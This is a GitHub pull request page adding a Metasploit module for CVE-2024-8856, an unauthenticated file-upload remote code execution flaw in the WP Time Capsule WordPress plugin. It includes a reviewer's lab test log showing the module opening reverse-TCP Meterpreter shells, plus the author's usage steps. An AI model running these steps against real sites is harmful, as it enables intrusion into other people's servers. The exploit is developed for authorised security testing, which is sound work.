Add exploit module for CVE-2024-8856 - WP Time Capsule RCE #19713
Conversation
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
jvoisin
reviewed
Dec 11, 2024
documentation/modules/exploit/multi/http/wp_time_capsule_file_upload_rce.md
Outdated
Show resolved
Hide resolved
Co-authored-by: Julien Voisin <[email protected]>
jheysel-r7
approved these changes
Dec 13, 2024
There was a problem hiding this comment.
Great work @Chocapikk! One tiny suggestion. Testing was as expected 🚀
Testing
ARCH_PHP
msf6 > use wp_time
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/multi/http/wp_time_capsule_file_upload_rce 2024-11-15 excellent Yes WordPress WP Time Capsule Arbitrary File Upload to RCE
1 \_ target: PHP In-Memory . . . .
2 \_ target: Unix/Linux Command Shell . . . .
3 \_ target: Windows Command Shell . . . .
Interact with a module by name or index. For example info 3, use 3 or use exploit/multi/http/wp_time_capsule_file_upload_rce
After interacting with a module you can manually set a TARGET with set TARGET 'Windows Command Shell'
[*] Using exploit/multi/http/wp_time_capsule_file_upload_rce
[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
msf6 exploit(multi/http/wp_time_capsule_file_upload_rce) > use 1
[*] Additionally setting TARGET => PHP In-Memory
msf6 exploit(multi/http/wp_time_capsule_file_upload_rce) > set rhost 172.16.199.158
rhost => 172.16.199.158
msf6 exploit(multi/http/wp_time_capsule_file_upload_rce) > set lhost 172.16.199.158
lhost => 172.16.199.158
msf6 exploit(multi/http/wp_time_capsule_file_upload_rce) > set rport 5555
rport => 5555
msf6 exploit(multi/http/wp_time_capsule_file_upload_rce) > run
[*] Started reverse TCP handler on 172.16.199.158:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. WP Time Capsule plugin appears to be vulnerable.
[*] Sending stage (40004 bytes) to 172.24.0.3
[+] Deleted YY.php
[*] Meterpreter session 1 opened (172.16.199.158:4444 -> 172.24.0.3:51180) at 2024-12-12 15:56:54 -0900
meterpreter > getuid
Server username: www-data
meterpreter > sysinfo
Computer : d41b5b7f71e1
OS : Linux d41b5b7f71e1 5.15.0-125-generic #135~20.04.1-Ubuntu SMP Mon Oct 7 13:56:22 UTC 2024 x86_64
Meterpreter : php/linux
meterpreter > exit
ARCH_CMD
msf6 exploit(multi/http/wp_time_capsule_file_upload_rce) > set target 1
target => 1
msf6 exploit(multi/http/wp_time_capsule_file_upload_rce) > set payload cmd/linux/http/x64/meterpreter/reverse_tcp
payload => cmd/linux/http/x64/meterpreter/reverse_tcp
msf6 exploit(multi/http/wp_time_capsule_file_upload_rce) > run
[*] Started reverse TCP handler on 172.16.199.158:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. WP Time Capsule plugin appears to be vulnerable.
[*] Sending stage (3045380 bytes) to 172.24.0.3
[+] Deleted z5.php
[*] Meterpreter session 2 opened (172.16.199.158:4444 -> 172.24.0.3:45764) at 2024-12-12 15:58:51 -0900
meterpreter > getuid
Server username: www-data
meterpreter > sysinfo
Computer : 172.24.0.3
OS : Debian 11.8 (Linux 5.15.0-125-generic)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
meterpreter > exit
Release NotesThis exploits a Remote Code Execution (RCE) vulnerability identified as CVE-2024-8856 in the WordPress WP Time Capsule plugin (versions ≤ 1.22.21). This vulnerability allows unauthenticated attackers to upload and execute arbitrary files due to improper validation within the plugin. |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Add this suggestion to a batch that can be applied as a single commit.
This suggestion is invalid because no changes were made to the code.
Suggestions cannot be applied while the pull request is closed.
Suggestions cannot be applied while viewing a subset of changes.
Only one suggestion per line can be applied in a batch.
Add this suggestion to a batch that can be applied as a single commit.
Applying suggestions on deleted lines is not supported.
You must change the existing code in this line in order to create a valid suggestion.
Outdated suggestions cannot be applied.
This suggestion has been applied or marked resolved.
Suggestions cannot be applied from pending reviews.
Suggestions cannot be applied on multi-line comments.
Suggestions cannot be applied while the pull request is queued to merge.
Suggestion cannot be applied right now. Please check back later.
Hello Metasploit Team,
I have developed a new Metasploit module that exploits a Remote Code Execution (RCE) vulnerability identified as CVE-2024-8856 in the WordPress WP Time Capsule plugin (versions ≤ 1.22.21). This vulnerability allows unauthenticated attackers to upload and execute arbitrary files due to improper validation within the plugin.
Over 20,000 active installations
msfconsoleuse exploit/multi/http/wp_time_capsule_file_upload_rceRHOSTSto the target IP addressTARGETURIto the WordPress installation pathPAYLOAD(e.g.,php/meterpreter/reverse_tcp)LHOSTandLPORTfor the payloadexploitThank you for your consideration.